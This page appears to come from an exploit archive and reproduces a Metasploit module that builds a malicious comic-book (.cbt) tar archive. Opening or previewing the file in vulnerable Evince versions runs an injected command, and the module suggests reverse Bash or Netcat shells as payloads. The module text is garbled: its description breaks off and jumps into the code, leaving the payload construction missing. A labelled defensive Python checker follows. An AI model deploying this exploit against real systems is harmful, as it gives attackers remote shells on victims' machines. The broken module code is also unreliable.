Exploits / Vulnerability Discovered : 2019-02-11
Type : local
Platform : linux
This exploit / vulnerability, Evince CBT File Command Injection (Metasploit), is for educational purposes only; if you use it, you do so at your own risk!
[+] Code ...
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'rex/zip'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Evince CBT File Command Injection',
      'Description' => %q{
        This module exploits a command injection vulnerability in Evince
        before version 3.24.1 when opening comic book `.cbt` files.
        Some file manager software, such as Nautilus and Atril, may allow
        automatic exploitation without user interaction due to thumbnailer
        preview functionality.
        Note that limited space is available for the payload (<256 bytes).
        Reverse Bash and Reverse Netcat payloads should be sufficiently small.
        This module has been tested successfully on evince versions:
    # Tar archive max path length is 256.
    if path.length > 256
      fail_with Failure::PayloadFailed, "Payload is too large (#{path.length}): Max path length is 256 characters"
    end

    # Tar archive max file name length is 100.
    path.split('/').each do |fname|
      if fname.length > 100
        fail_with Failure::PayloadFailed, "File name too long (#{fname.length}): Max filename length is 100 characters"
      end
    end

    # Create malicious tar archive
    tarfile = StringIO.new
    Rex::Tar::Writer.new tarfile do |tar|
      tar.add_file path, 0644 do |io|
        io.write ''
      end
      # Pad file to 1+ MB to trigger tar checkpoint action
      tar.add_file rand_text_alphanumeric(10..20), 0644 do |io|
        io.write rand_text(1_000_000..1_100_000)
      end
    end
    tarfile.rewind
    cbt = tarfile.read

    print_status "Writing file: #{datastore['FILENAME']} (#{cbt.length} bytes) ..."
    file_create cbt
  end
end
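
For triage on the defensive side, the following is an added example (not part of the module or of the Metasploit project) that lists the members of a `.cbt` archive and flags names beginning with `-`, and checks an Evince version string against the 3.24.1 boundary given in the description. The function names, the sample member names and the assumption that a leading `-` is what makes a tar command line treat a member name as an option are this example's own.

```python
import io
import tarfile

FIXED_VERSION = (3, 24, 1)  # from the module description: "before version 3.24.1"


def evince_is_patched(version: str) -> bool:
    """True if the given Evince version string is 3.24.1 or later."""
    parts = tuple(int(p) for p in version.split(".")[:3])
    return parts >= FIXED_VERSION


def option_like_members(data: bytes) -> list:
    """Return member names in a .cbt (tar) archive that begin with '-'.

    Assumption: a name starting with '-' is what a tar command line would
    treat as an option instead of a file name. Raises ValueError if the
    data is not a readable tar archive.
    """
    try:
        with tarfile.open(fileobj=io.BytesIO(data), mode="r:") as tar:
            return [m.name for m in tar if m.name.startswith("-")]
    except tarfile.TarError as exc:
        raise ValueError(f"not a valid tar archive: {exc}") from exc


def build_sample(names) -> bytes:
    """Build a constructed in-memory tar with empty members (test input only)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name in names:
            tar.addfile(tarfile.TarInfo(name=name))  # size defaults to 0
    return buf.getvalue()


if __name__ == "__main__":
    # Constructed inputs: one ordinary archive, one with an option-like name.
    clean = build_sample(["page01.jpg", "page02.jpg"])
    odd = build_sample(["page01.jpg", "--example-option=value"])
    for label, blob in (("clean", clean), ("odd", odd)):
        print(label, option_like_members(blob))
    print("3.22.1 patched?", evince_is_patched("3.22.1"))
```

A flagged archive is a reason to quarantine the file before any thumbnailer or viewer touches it; an unflagged one is not proof that the file is safe.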